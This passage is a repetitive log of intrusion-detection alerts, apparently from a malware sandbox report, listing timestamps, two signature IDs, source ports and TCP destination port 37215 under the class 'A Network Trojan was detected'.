            Timestamp:05/28/24-09:57:00.803809
            SID:2835222
            Source Port:48554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067248
            SID:2829579
            Source Port:34016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260809
            SID:2829579
            Source Port:44078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.058929
            SID:2835222
            Source Port:50814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313108
            SID:2835222
            Source Port:55926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739603
            SID:2835222
            Source Port:48652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996024
            SID:2829579
            Source Port:49168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.746931
            SID:2829579
            Source Port:49430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849141
            SID:2829579
            Source Port:55992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872598
            SID:2829579
            Source Port:48506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767988
            SID:2829579
            Source Port:38040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740486
            SID:2829579
            Source Port:47860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564900
            SID:2835222
            Source Port:57990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831619
            SID:2829579
            Source Port:50266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825355
            SID:2829579
            Source Port:59554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.663892
            SID:2829579
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739641
            SID:2829579
            Source Port:34566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.943797
            SID:2829579
            Source Port:43354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808739
            SID:2829579
            Source Port:60110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014484
            SID:2829579
            Source Port:56216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027076
            SID:2835222
            Source Port:60706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952221
            SID:2835222
            Source Port:39060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737941
            SID:2835222
            Source Port:58518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508085
            SID:2835222
            Source Port:35856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026517
            SID:2835222
            Source Port:39164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766584
            SID:2829579
            Source Port:53362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767685
            SID:2829579
            Source Port:45882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.771434
            SID:2829579
            Source Port:37322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995284
            SID:2835222
            Source Port:33252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.933244
            SID:2835222
            Source Port:32836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064539
            SID:2835222
            Source Port:60446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852878
            SID:2829579
            Source Port:45134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864615
            SID:2835222
            Source Port:36254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924672
            SID:2835222
            Source Port:51002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.774788
            SID:2829579
            Source Port:51474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300150
            SID:2835222
            Source Port:37404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913300
            SID:2829579
            Source Port:34488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348909
            SID:2835222
            Source Port:59546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854415
            SID:2835222
            Source Port:42990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858262
            SID:2835222
            Source Port:56614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064052
            SID:2835222
            Source Port:44420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922062
            SID:2829579
            Source Port:33512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.425040
            SID:2835222
            Source Port:34238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.997577
            SID:2835222
            Source Port:57810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457494
            SID:2835222
            Source Port:35712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927299
            SID:2835222
            Source Port:36952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041195
            SID:2829579
            Source Port:42874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748463
            SID:2829579
            Source Port:58958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.655945
            SID:2835222
            Source Port:33442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900510
            SID:2835222
            Source Port:35584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765918
            SID:2835222
            Source Port:34610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872537
            SID:2829579
            Source Port:44058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052481
            SID:2835222
            Source Port:48214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931641
            SID:2829579
            Source Port:52680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.274840
            SID:2835222
            Source Port:36384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.459710
            SID:2835222
            Source Port:50680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.866696
            SID:2835222
            Source Port:39442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.049238
            SID:2829579
            Source Port:42866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931943
            SID:2835222
            Source Port:46308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.929939
            SID:2829579
            Source Port:46442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304193
            SID:2835222
            Source Port:37026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989733
            SID:2829579
            Source Port:36140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953665
            SID:2835222
            Source Port:44394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730898
            SID:2829579
            Source Port:55200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610968
            SID:2829579
            Source Port:53190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721945
            SID:2835222
            Source Port:35288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541899
            SID:2829579
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.910597
            SID:2835222
            Source Port:38556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846992
            SID:2835222
            Source Port:42346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152918
            SID:2829579
            Source Port:54842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054405
            SID:2829579
            Source Port:56744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919436
            SID:2829579
            Source Port:53914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604665
            SID:2835222
            Source Port:49262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.503528
            SID:2829579
            Source Port:58186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968250
            SID:2829579
            Source Port:53004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291005
            SID:2829579
            Source Port:35246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.742019
            SID:2835222
            Source Port:35910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707668
            SID:2835222
            Source Port:51110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730687
            SID:2835222
            Source Port:44548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596511
            SID:2835222
            Source Port:56522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.860947
            SID:2829579
            Source Port:57284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.739208
            SID:2829579
            Source Port:57564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919447
            SID:2829579
            Source Port:55114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065436
            SID:2829579
            Source Port:55588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.051851
            SID:2829579
            Source Port:58962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878855
            SID:2829579
            Source Port:49372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932081
            SID:2835222
            Source Port:45612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.524162
            SID:2835222
            Source Port:40352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.616660
            SID:2829579
            Source Port:40886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843314
            SID:2829579
            Source Port:48132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.757838
            SID:2835222
            Source Port:46890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.843575
            SID:2835222
            Source Port:57124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841805
            SID:2835222
            Source Port:35954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.743894
            SID:2835222
            Source Port:48076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064942
            SID:2829579
            Source Port:49004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954720
            SID:2829579
            Source Port:59030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.916534
            SID:2829579
            Source Port:50284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.938916
            SID:2829579
            Source Port:50110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.498333
            SID:2835222
            Source Port:32810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880240
            SID:2829579
            Source Port:59642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953572
            SID:2835222
            Source Port:49608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507073
            SID:2835222
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.363830
            SID:2835222
            Source Port:58824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.316890
            SID:2829579
            Source Port:50012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770827
            SID:2829579
            Source Port:37124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696715
            SID:2835222
            Source Port:53576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697471
            SID:2835222
            Source Port:40914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.773714
            SID:2835222
            Source Port:44552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736376
            SID:2835222
            Source Port:54116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.581970
            SID:2829579
            Source Port:52652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809638
            SID:2835222
            Source Port:57438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.319554
            SID:2835222
            Source Port:50698
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943457
            SID:2835222
            Source Port:46250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038378
            SID:2835222
            Source Port:37346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714065
            SID:2829579
            Source Port:36138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031643
            SID:2829579
            Source Port:52732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482560
            SID:2829579
            Source Port:58930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.582032
            SID:2835222
            Source Port:59672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060168
            SID:2835222
            Source Port:37124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.853979
            SID:2829579
            Source Port:55092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.560099
            SID:2835222
            Source Port:35824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.432208
            SID:2829579
            Source Port:46596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508258
            SID:2835222
            Source Port:37342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.308865
            SID:2835222
            Source Port:56510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048144
            SID:2829579
            Source Port:40692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575891
            SID:2829579
            Source Port:49048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730867
            SID:2829579
            Source Port:41252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904066
            SID:2835222
            Source Port:51198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180811
            SID:2829579
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.790619
            SID:2829579
            Source Port:38522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936334
            SID:2835222
            Source Port:51660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766904
            SID:2829579
            Source Port:54610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885116
            SID:2829579
            Source Port:48398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821609
            SID:2829579
            Source Port:38102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922193
            SID:2835222
            Source Port:58984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941660
            SID:2829579
            Source Port:43886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.004807
            SID:2829579
            Source Port:43540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843242
            SID:2835222
            Source Port:36866
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862712
            SID:2835222
            Source Port:58386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066560
            SID:2835222
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.844732
            SID:2835222
            Source Port:52270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995161
            SID:2835222
            Source Port:52156
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026963
            SID:2829579
            Source Port:37340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158351
            SID:2829579
            Source Port:46472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.072597
            SID:2835222
            Source Port:59062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.294161
            SID:2835222
            Source Port:56036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.617610
            SID:2835222
            Source Port:42554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927885
            SID:2835222
            Source Port:35646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.913997
            SID:2835222
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735767
            SID:2829579
            Source Port:47764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804425
            SID:2829579
            Source Port:55168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.020544
            SID:2835222
            Source Port:48450
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.453731
            SID:2835222
            Source Port:58656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808628
            SID:2829579
            Source Port:57604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855295
            SID:2829579
            Source Port:36046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.419273
            SID:2835222
            Source Port:48732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.580608
            SID:2829579
            Source Port:41912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880265
            SID:2829579
            Source Port:41256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.677428
            SID:2835222
            Source Port:55192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860699
            SID:2829579
            Source Port:47148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346133
            SID:2829579
            Source Port:39504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.482944
            SID:2829579
            Source Port:49700
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.358265
            SID:2829579
            Source Port:53042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953732
            SID:2829579
            Source Port:50580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748643
            SID:2835222
            Source Port:44392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849593
            SID:2829579
            Source Port:38292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.778901
            SID:2835222
            Source Port:54246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:46.563498
            SID:2835222
            Source Port:50424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788909
            SID:2829579
            Source Port:39216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051016
            SID:2829579
            Source Port:52390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.936131
            SID:2829579
            Source Port:53956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925610
            SID:2835222
            Source Port:46170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.993084
            SID:2829579
            Source Port:56142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273426
            SID:2835222
            Source Port:53834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730549
            SID:2829579
            Source Port:54564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942465
            SID:2835222
            Source Port:46378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873093
            SID:2829579
            Source Port:50582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825692
            SID:2835222
            Source Port:59434
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990104
            SID:2829579
            Source Port:40044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457372
            SID:2835222
            Source Port:36738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516110
            SID:2829579
            Source Port:33984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317191
            SID:2829579
            Source Port:41406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.440201
            SID:2829579
            Source Port:37482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.665208
            SID:2829579
            Source Port:42416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760417
            SID:2835222
            Source Port:35306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936814
            SID:2835222
            Source Port:43296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062996
            SID:2829579
            Source Port:48210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.505666
            SID:2829579
            Source Port:53456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046959
            SID:2829579
            Source Port:47410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261670
            SID:2829579
            Source Port:39404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299337
            SID:2829579
            Source Port:37270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786905
            SID:2835222
            Source Port:47822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.605343
            SID:2835222
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761094
            SID:2835222
            Source Port:46798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299425
            SID:2829579
            Source Port:55780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.550095
            SID:2829579
            Source Port:49358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.812648
            SID:2835222
            Source Port:41568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809418
